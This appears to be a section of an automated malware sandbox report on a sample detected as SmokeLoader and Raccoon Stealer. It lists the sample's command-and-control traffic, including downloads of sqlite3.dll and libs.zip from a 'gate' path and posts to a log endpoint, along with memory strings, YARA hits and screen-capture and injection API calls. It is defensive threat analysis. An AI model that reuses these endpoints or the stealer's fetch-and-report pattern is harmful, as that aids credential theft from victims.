                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sun, 13 Sep 2020 18:55:12 GMTContent-Type: application/zipContent-Length: 2828315Connection: closeLast-Modified: Wed, 03 Apr 2019 07:47:18 GMTETag: "5ca46506-2b281b"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 9a 7a 6e 4e 3c 09 f8 7b 72 d2 00 00 d0 69 01 00 0b 00 00 00 6e 73 73 64 62 6d 33 2e 64 6c 6c ec fd 7f 7c 14 d5 d5 38 00 cf ee 4e 92 0d 59 d8 05 36 18 24 4a 90 a0 d1 a0 06 16 24 31 80 d9 84 dd 44 20 b0 61 c9 2e 11 13 b4 6a 4c b7 56 f9 b1 43 b0 12 08 4e 02 3b 19 b7 f5 e9 a3 7d ec 2f ab f5 f1 e9 0f db a7 b6 b5 80 d5 ea 86 d8 24 f8 13 81 5a 2c 54 a3 52 bd 71 63 8d 92 86 45 63 e6 3d e7 dc 99 dd 0d da ef f7 fb be 7f bf f0 c9 ec cc dc 3b f7 9e 7b ee b9 e7 9e 73 ee b9 e7 d6 de 70 bf 60 11 04 41 84 3f 4d 13 84 83 02 ff 57 21 fc df ff e5 99 04 61 ca ec 3f 4e 11 9e ca 7e 65 ce 41 d3 ea 57 e6 ac 6f f9 fa b6 82 cd 5b ef ba 7d eb cd df 2c b8 e5 e6 3b ef bc 2b 5c f0 b5 db 0a b6 4a 77 16 7c fd ce 82 15 6b fd 05 df bc eb d6 db ae 9a 3c 79 52 a1 5e c6 45 07 6f 18 6e 78 73 d1 63 c6 9f ef d1 9f 3d 56 0f bf ed cf 2c fe e9 46 f8 ed bb fb cc 63 75 f4 bc e4 a7 1b e8 77 c1 4f fd f4 5b f2 d3 75 f0 7b cf d3 3c df 77 ff b8 f8 a7 37 50 19 8b 1f 7b 91 9e 4b 7e ea a6 df 45 f4 dd 77 ff f8 d2 63 fc f7 1a 7a 5e f7 f5 5b 5a b0 be 7f d7 36 9f 47 10 56 9b 32 84 e7 2b ba 6e 34 de 0d 08 97 cc c9 31 4d c9 11 2e 84 86 97 f0 77 7b 66 c3 bd 03 6e 4a 4c f8 e8 a0 7b b3 20 64 0a f4 9c fc 15 da 4d 84 e4 2b b6 98 20 b9 82 7f e4 10 84 d4 2f ff 29 b8 ce 24 58 21 b5 08 b2 f4 e3 cb 9b 4c c2 0e 4b 1a 60 ab 4d c2 91 8b e0 77 b3 49 f8 ef 4c 41 38 72 ad 49 58 ff 7f e8 a3 a2 72 d3 c4 be 04 38 37 98 ff 7d fe ab c2 b7 ed 08 c3 ef e9 3c bd 5d 17 72 b8 d3 ff 15 00 54 57 6d bd f5 e6 f0 cd 82 b0 62 36 2f 13 5f 0a 17 9b d2 b3 61 bd 15 57 f1 6c 42 02 db e0 33 11 6e 84 e5 5f ca 17 bb 6a eb b6 ad b7 08 02 6f eb 4d 7a 9d 15 5f 51 de d6 db ee b8 eb 16 81 da 8e 38 10 ac f0 bb e2 4b f9 2a 85 ff ff bf ff a7 7f f5 ea 90 bc ac c8 67 72 08 e1 4c b9 cd 2a 48 2e b5 d6 76 b6 fb 8b 84 36 5b 2a 92 bf e9 34 49 97 a8 dd 7b de 31 67 09 c2 3c 1c 02 3e 4d ca d3 24 47 9d 26 59 d9 8b d0 f7 f2 0b ce c6 1e 2d f7 a1 12 93 a3 4f 98 01 39 5c b1 c6 1e 2c 74 c8 e1 57 1b 6d ae 58 20 a8 b6 59 d5 33 ea 2a 87 e2 19 53 3c 23 7d 1e 22 85 3e cf 30 52 42 67 2c 9c 1d b2 6c 68 2e 73 8b e1 6f d8 0f b8 c5 e6 72 cf 70 38 13 ae 09 29 bf cf 33 82 1d 4b 0f 76 fb 01 93 eb 64 73 d9 8d 6e 33 14 2b 5d 07 8f f6 03 2b dc e3 ae c3 ed 6b 72 4d 75 01 5f 90 59 5c 82 a0 0e cb 2f 38 54 cf 18 96 0b af 06 26 0b 42 43 83 22 8d 75 8e da 3b be 0f 65 a9 6b 20 75 24 1e 81 cf 15 8f cd 7e 60 bd 7b 1c 21 ab 4d c8 09 f3 ae 5c 57 ac 59 a9 33 37 2b 6e 51 f5 5a 95 2a ab ea b1 c5 33 5c 47 15 bf 35 64 be a1 f8 90 5a 9f 68 56 4c cd ea 5a 1b 7c 6b 89 35 17 f7 ab 58 46 ac 59 1e cc 6c 56 56 57 9a d5 43 98 d8 7c bd fd 80 80 cf 62 fb aa 5c 93 5a 0f 95 87 6d 81 20 f3 03 30 f0 d4 d0 50 fe 46 38 7b 5d 90 55 11 70 da da 52 57 2c 6e 91 fb b5 4d 4d 1b d5 7f e8 c8 73 aa 1e c2 5f 40 b5 aa 3e 51 dd 08 20 8e a8 b5 4e a5 3e 11
                          Source: global trafficHTTP traffic detected: GET /gate/sqlite3.dll HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: chinadevmonster.topConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /gate/libs.zip HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: chinadevmonster.topConnection: Keep-Alive
                          Source: unknownDNS traffic detected: queries for: dkajsdjiqwdwnfj.info
                          Source: unknownHTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://2831ujedkdajsdj.info/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 336Host: 2831ujedkdajsdj.info
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.16.1Date: Sun, 13 Sep 2020 18:54:41 GMTContent-Type: text/html; charset=windows-1251Transfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: PHP/7.2.31Data Raw: 31 38 0d 0a 13 00 00 00 63 07 35 6e ed cd cf 93 0a 8d c8 6b 6d 7d e5 a4 9e 64 5c 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 18c5nkm}d\0
                          Source: explorer.exe, 00000002.00000003.1406505926.000000000AC63000.00000004.00000001.sdmpString found in binary or memory: http://2831ujedkdajsdj.info/
                          Source: 3BD3.exe, 00000004.00000002.1528479530.000000000076C000.00000004.00000001.sdmpString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
                          Source: AccessibleHandler.dll.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                          Source: AccessibleHandler.dll.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                          Source: 3BD3.exe, 00000004.00000002.1528479530.000000000076C000.00000004.00000001.sdmpString found in binary or memory: http://cert.int-x3.letsencrypt.org/0Y
                          Source: 3BD3.exe, 00000004.00000002.1528758602.00000000007AD000.00000004.00000001.sdmpString found in binary or memory: http://chinadevmonster.top/
                          Source: 3BD3.exe, 00000004.00000002.1528479530.000000000076C000.00000004.00000001.sdmpString found in binary or memory: http://chinadevmonster.top/file_handler4/file.php?hash=29a48d36455677adfa3fd9866445462d19dfa596&js=c
                          Source: 3BD3.exe, 00000004.00000002.1528479530.000000000076C000.00000004.00000001.sdmp, 3BD3.exe, 00000004.00000002.1528758602.00000000007AD000.00000004.00000001.sdmp, 3BD3.exe, 00000004.00000002.1531805660.000000004B415000.00000004.00000001.sdmpString found in binary or memory: http://chinadevmonster.top/gate
                          Source: 3BD3.exe, 00000004.00000002.1528479530.000000000076C000.00000004.00000001.sdmpString found in binary or memory: http://chinadevmonster.top/gate/libs.zip
                          Source: 3BD3.exe, 00000004.00000002.1528424101.000000000075E000.00000004.00000001.sdmpString found in binary or memory: http://chinadevmonster.top/gate/log.php
                          Source: 3BD3.exe, 00000004.00000002.1528424101.000000000075E000.00000004.00000001.sdmpString found in binary or memory: http://chinadevmonster.top/gate/log.phpditional
                          Source: 3BD3.exe, 00000004.00000002.1528424101.000000000075E000.00000004.00000001.sdmpString found in binary or memory: http://chinadevmonster.top/gate/log.phpn
                          Source: 3BD3.exe, 00000004.00000002.1528424101.000000000075E000.00000004.00000001.sdmp, 3BD3.exe, 00000004.00000002.1528479530.000000000076C000.00000004.00000001.sdmpString found in binary or memory: http://chinadevmonster.top/gate/sqlite3.dll
                          Source: 3BD3.exe, 00000004.00000002.1528424101.000000000075E000.00000004.00000001.sdmpString found in binary or memory: http://chinadevmonster.top/gate/sqlite3.dllnnel%
                          Source: 3BD3.exe, 00000004.00000002.1528758602.00000000007AD000.00000004.00000001.sdmpString found in binary or memory: http://chinadevmonster.top/gatea
                          Source: 3BD3.exe, 00000004.00000002.1528758602.00000000007AD000.00000004.00000001.sdmpString found in binary or memory: http://chinadevmonster.top/gatel
                          Source: nssckbi.dll.4.drString found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
                          Source: nssckbi.dll.4.drString found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
                          Source: 3BD3.exe, 00000004.00000002.1528479530.000000000076C000.00000004.00000001.sdmpString found in binary or memory: http://cps.letsencrypt.org0
                          Source: 3BD3.exe, 00000004.00000002.1530773523.000000004B38A000.00000004.00000001.sdmpString found in binary or memory: http://cps.root-x1.letm6
                          Source: 3BD3.exe, 00000004.00000002.1528479530.000000000076C000.00000004.00000001.sdmpString found in binary or memory: http://cps.root-x1.letsencrypt.org0
                          Source: nssckbi.dll.4.drString found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
                          Source: nssckbi.dll.4.drString found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
                          Source: nssckbi.dll.4.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                          Source: nssckbi.dll.4.drString found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl0
                          Source: nssckbi.dll.4.drString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                          Source: 3BD3.exe, 00000004.00000002.1528479530.000000000076C000.00000004.00000001.sdmpString found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
                          Source: nssckbi.dll.4.drString found in binary or memory: http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0
                          Source: nssckbi.dll.4.drString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                          Source: nssckbi.dll.4.drString found in binary or memory: http://crl.securetrust.com/SGCA.crl0
                          Source: nssckbi.dll.4.drString found in binary or memory: http://crl.securetrust.com/STCA.crl0
                          Source: AccessibleHandler.dll.4.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                          Source: nssckbi.dll.4.drString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
                          Source: AccessibleHandler.dll.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                          Source: AccessibleHandler.dll.4.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                          Source: AccessibleHandler.dll.4.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                          Source: AccessibleHandler.dll.4.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
                          Source: nssckbi.dll.4.drString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
                          Source: explorer.exe, 00000002.00000000.1320309521.000000000C7B6000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
                          Source: 3BD3.exe, 00000004.00000002.1528479530.000000000076C000.00000004.00000001.sdmpString found in binary or memory: http://isrg.trustid.ocsp.identrust.com0;
                          Source: nssckbi.dll.4.drString found in binary or memory: http://ocsp.accv.es0
                          Source: AccessibleHandler.dll.4.drString found in binary or memory: http://ocsp.digicert.com0C
                          Source: AccessibleHandler.dll.4.drString found in binary or memory: http://ocsp.digicert.com0N
                          Source: 3BD3.exe, 00000004.00000002.1528479530.000000000076C000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.int-x3.letsencrypt.org0/
                          Source: AccessibleHandler.dll.4.drString found in binary or memory: http://ocsp.thawte.com0
                          Source: nssckbi.dll.4.drString found in binary or memory: http://policy.camerfirma.com0
                          Source: nssckbi.dll.4.drString found in binary or memory: http://repository.swisssign.com/0
                          Source: 3BD3.exe, 00000004.00000003.1495277519.000000004B3B4000.00000004.00000001.sdmp, 1xVPfvJcrg.4.drString found in binary or memory: http://ss.ask.com/query?q=
                          Source: AccessibleHandler.dll.4.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                          Source: AccessibleHandler.dll.4.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                          Source: AccessibleHandler.dll.4.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                          Source: explorer.exe, 00000002.00000000.1293389954.00000000014B0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
                          Source: nssckbi.dll.4.drString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
                          Source: nssckbi.dll.4.drString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
                          Source: nssckbi.dll.4.drString found in binary or memory: http://www.accv.es/legislacion_c.htm0U
                          Source: nssckbi.dll.4.drString found in binary or memory: http://www.accv.es00
                          Source: explorer.exe, 00000002.00000000.1320309521.000000000C7B6000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                          Source: explorer.exe, 00000002.00000000.1320309521.000000000C7B6000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
                          Source: nssckbi.dll.4.drString found in binary or memory: http://www.cert.fnmt.es/dpcs/0
                          Source: nssckbi.dll.4.drString found in binary or memory: http://www.certicamara.com/dpc/0Z
                          Source: nssckbi.dll.4.drString found in binary or memory: http://www.certplus.com/CRL/class2.crl0
                          Source: nssckbi.dll.4.drString found in binary or memory: http://www.chambersign.org1
                          Source: nssckbi.dll.4.drString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                          Source: nssckbi.dll.4.drString found in binary or memory: http://www.firmaprofesional.com/cps0
                          Source: explorer.exe, 00000002.00000000.1320309521.000000000C7B6000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
                          Source: explorer.exe, 00000002.00000000.1320309521.000000000C7B6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                          Source: explorer.exe, 00000002.00000000.1320309521.000000000C7B6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                          Source: explorer.exe, 00000002.00000000.1320309521.000000000C7B6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                          Source: explorer.exe, 00000002.00000000.1320309521.000000000C7B6000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
                          Source: explorer.exe, 00000002.00000000.1320309521.000000000C7B6000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                          Source: mozglue.dll.4.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                          Source: AccessibleHandler.dll.4.drString found in binary or memory: http://www.mozilla.com0
                          Source: 3BD3.exe, 00000004.00000002.1528479530.000000000076C000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehph
                          Source: nssckbi.dll.4.drString found in binary or memory: http://www.pkioverheid.nl/policies/root-policy-G20
                          Source: nssckbi.dll.4.drString found in binary or memory: http://www.quovadis.bm0
                          Source: nssckbi.dll.4.drString found in binary or memory: http://www.quovadisglobal.com/cps0
                          Source: explorer.exe, 00000002.00000000.1320309521.000000000C7B6000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
                          Source: explorer.exe, 00000002.00000000.1320309521.000000000C7B6000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
                          Source: sqlite3.dll.4.drString found in binary or memory: http://www.sqlite.org/copyright.html.
                          Source: explorer.exe, 00000002.00000000.1320309521.000000000C7B6000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
                          Source: nssckbi.dll.4.drString found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
                          Source: explorer.exe, 00000002.00000000.1320309521.000000000C7B6000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
                          Source: explorer.exe, 00000002.00000000.1320309521.000000000C7B6000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                          Source: 3BD3.exe, 00000004.00000003.1495277519.000000004B3B4000.00000004.00000001.sdmp, 1xVPfvJcrg.4.drString found in binary or memory: https://autosuggest.search.aol.com/autocomplete/get?output=json&it=&q=
                          Source: 3BD3.exe, 00000004.00000002.1528479530.000000000076C000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
                          Source: 3BD3.exe, 00000004.00000002.1530759275.000000004B380000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com
                          Source: nssckbi.dll.4.drString found in binary or memory: https://ocsp.quovadisoffshore.com0
                          Source: nssckbi.dll.4.drString found in binary or memory: https://repository.luxtrust.lu0
                          Source: 3BD3.exe, 00000004.00000003.1495277519.000000004B3B4000.00000004.00000001.sdmp, 1xVPfvJcrg.4.drString found in binary or memory: https://search.aol.com/favicon.icohttps://search.aol.com/aol/search?q=
                          Source: 3BD3.exe, 00000004.00000003.1495277519.000000004B3B4000.00000004.00000001.sdmp, 1xVPfvJcrg.4.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search?ei=
                          Source: 3BD3.exe, 00000004.00000003.1495277519.000000004B3B4000.00000004.00000001.sdmp, 1xVPfvJcrg.4.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                          Source: 3BD3.exe, 00000004.00000003.1495277519.000000004B3B4000.00000004.00000001.sdmp, 1xVPfvJcrg.4.drString found in binary or memory: https://sp.ask.com/sh/i/a16/favicon/favicon.icohttps://www.ask.com/web?q=
                          Source: y2017hGX7.4.drString found in binary or memory: https://support.mozilla.org
                          Source: y2017hGX7.4.drString found in binary or memory: https://support.mozilla.org/en-US/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=fire
                          Source: y2017hGX7.4.drString found in binary or memory: https://support.mozilla.org/en-US/products/firefoxgro.allizom.troppus.
                          Source: 3BD3.exe, 00000004.00000002.1528044132.0000000000726000.00000004.00000001.sdmp, 3BD3.exe, 00000004.00000002.1528424101.000000000075E000.00000004.00000001.sdmp, 3BD3.exe, 00000004.00000002.1528479530.000000000076C000.00000004.00000001.sdmpString found in binary or memory: https://telete.in/jarkadiyvolniy
                          Source: 3BD3.exe, 00000004.00000002.1528479530.000000000076C000.00000004.00000001.sdmpString found in binary or memory: https://telete.in/org/img/t_logo.png
                          Source: 3BD3.exe, 00000004.00000002.1528479530.000000000076C000.00000004.00000001.sdmpString found in binary or memory: https://tenadevmonster.top/
                          Source: nssckbi.dll.4.drString found in binary or memory: https://www.catcert.net/verarrel
                          Source: nssckbi.dll.4.drString found in binary or memory: https://www.catcert.net/verarrel05
                          Source: AccessibleHandler.dll.4.drString found in binary or memory: https://www.digicert.com/CPS0
                          Source: 3BD3.exe, 00000004.00000003.1495277519.000000004B3B4000.00000004.00000001.sdmp, 1xVPfvJcrg.4.drString found in binary or memory: https://www.google.com/favicon.ico
                          Source: y2017hGX7.4.drString found in binary or memory: https://www.mozilla.org
                          Source: y2017hGX7.4.drString found in binary or memory: https://www.mozilla.org/en-US/about/gro.allizom.www.
                          Source: y2017hGX7.4.drString found in binary or memory: https://www.mozilla.org/en-US/contribute/gro.allizom.www.
                          Source: 3BD3.exe, 00000004.00000002.1528479530.000000000076C000.00000004.00000001.sdmp, 3BD3.exe, 00000004.00000002.1530773523.000000004B38A000.00000004.00000001.sdmp, firefox_urls.txt.4.drString found in binary or memory: https://www.mozilla.org/en-US/firefox/61.0.1/firstrun/
                          Source: y2017hGX7.4.drString found in binary or memory: https://www.mozilla.org/en-US/firefox/61.0.1/firstrun/Welcome
                          Source: 3BD3.exe, 00000004.00000002.1530773523.000000004B38A000.00000004.00000001.sdmpString found in binary or memory: https://www.mozilla.org/en-US/firefox/61.0.1/firstrun/vV
                          Source: y2017hGX7.4.drString found in binary or memory: https://www.mozilla.org/en-US/firefox/central/gro.allizom.www.
                          Source: 3BD3.exe, 00000004.00000002.1528479530.000000000076C000.00000004.00000001.sdmp, firefox_urls.txt.4.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                          Source: y2017hGX7.4.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                          Source: y2017hGX7.4.drString found in binary or memory: https://www.mozilla.org/media/img/firefox/template/page-image-master.1b6efe3d5631.jpg
                          Source: y2017hGX7.4.drString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                          Source: 3BD3.exe, 00000004.00000002.1528479530.000000000076C000.00000004.00000001.sdmp, firefox_urls.txt.4.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                          Source: y2017hGX7.4.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443

                          Key, Mouse, Clipboard, Microphone and Screen Capturing:

                          barindex
                          Yara detected SmokeLoaderShow sources
                          Source: Yara matchFile source: 00000000.00000002.1330007715.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000003.1267461020.00000000001E0000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000003.00000002.1451110742.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000003.00000003.1428267644.00000000001F0000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0.2.y98WYYcJ2U.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.y98WYYcJ2U.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.3.y98WYYcJ2U.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 3.2.cwfbibg.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 3.2.cwfbibg.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 3.3.cwfbibg.1f0000.0.raw.unpack, type: UNPACKEDPE
                          Source: C:\Users\user\AppData\Local\Temp\3BD3.exeCode function: 4_2_00425145 __EH_prolog,GdiplusStartup,GetDesktopWindow,GetWindowRect,GetWindowDC,GetDeviceCaps,CreateCompatibleDC,CreateDIBSection,DeleteDC,DeleteDC,DeleteDC,SaveDC,SelectObject,BitBlt,RestoreDC,DeleteDC,DeleteDC,DeleteDC,GdipAlloc,GdipCreateBitmapFromHBITMAP,_mbstowcs,GdipSaveImageToFile,DeleteObject,GdiplusShutdown,4_2_00425145
                          Source: 48F3.exe, 00000005.00000002.1653465876.000000000621A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                          E-Banking Fraud:

                          barindex
                          Yara detected Raccoon StealerShow sources
                          Source: Yara matchFile source: dump.pcap, type: PCAP
                          Source: Yara matchFile source: 00000004.00000003.1518715900.000000004B3BE000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000004.00000002.1528479530.000000000076C000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 3BD3.exe PID: 4680, type: MEMORY
                          Source: Yara matchFile source: C:\Users\user\AppData\LocalLow\machineinfo.txt, type: DROPPED
                          Source: C:\Users\user\AppData\Local\Temp\48F3.exeProcess Stats: CPU usage > 98%
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_0040182B Sleep,NtTerminateProcess,0_2_0040182B
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_00402440 NtClose,0_2_00402440
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_0040184B Sleep,NtTerminateProcess,0_2_0040184B
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_00401856 Sleep,NtTerminateProcess,0_2_00401856
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_00401837 Sleep,NtTerminateProcess,0_2_00401837
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_00401600 NtMapViewOfSection,0_2_00401600
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_00401758 Sleep,NtTerminateProcess,0_2_00401758
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_004017DA NtTerminateProcess,0_2_004017DA
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_004023E8 NtClose,0_2_004023E8
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268A360 ZwAllocateVirtualMemory,LdrInitializeThunk,0_2_7268A360
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268A37A NtQueryInformationProcess,LdrInitializeThunk,0_2_7268A37A
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268A300 ZwOpenKey,LdrInitializeThunk,0_2_7268A300
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268A6A0 ZwCreateSection,LdrInitializeThunk,0_2_7268A6A0
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268A480 ZwMapViewOfSection,LdrInitializeThunk,0_2_7268A480
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268A560 ZwQuerySystemInformation,LdrInitializeThunk,0_2_7268A560
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268A520 ZwEnumerateKey,LdrInitializeThunk,0_2_7268A520
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268A5C0 ZwDuplicateObject,LdrInitializeThunk,0_2_7268A5C0
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268A260 ZwWriteFile,0_2_7268A260
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726CA27C RtlAllocateHeap,ZwQueryVirtualMemory,RtlFreeHeap,0_2_726CA27C
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_72645275 RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwFsControlFile,RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,ZwClose,RtlFreeHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,ZwClose,RtlFreeHeap,RtlEnterCriticalSection,RtlLeaveCriticalSection,0_2_72645275
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268B270 ZwLockVirtualMemory,0_2_7268B270
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268A240 ZwReadFile,0_2_7268A240
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726C825D ZwRaiseHardError,0_2_726C825D
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_72701243 memset,RtlGetCurrentServiceSessionId,ZwTraceEvent,0_2_72701243
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_72718248 ZwAlertThreadByThreadId,0_2_72718248
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268A220 ZwWaitForSingleObject,0_2_7268A220
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7267523D ZwAllocateVirtualMemory,ZwAllocateVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,ZwAllocateVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,0_2_7267523D
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_72688200 EtwpCreateEtwThread,ZwResumeThread,EtwpCreateEtwThread,ZwTerminateThread,ZwClose,0_2_72688200
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7267A20E RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwReleaseWorkerFactoryWorker,0_2_7267A20E
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_72648209 RtlInitUnicodeStringEx,ZwQueryValueKey,RtlInitUnicodeStringEx,RtlPrefixUnicodeString,ZwEnumerateKey,ZwOpenKey,RtlInitUnicodeStringEx,ZwQueryValueKey,RtlFreeHeap,ZwClose,RtlAllocateHeap,RtlCompareUnicodeString,ZwClose,RtlFreeHeap,ZwClose,0_2_72648209
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7270221F ZwCreateSection,ZwMapViewOfSection,memset,memcpy,ZwUnmapViewOfSection,ZwClose,0_2_7270221F
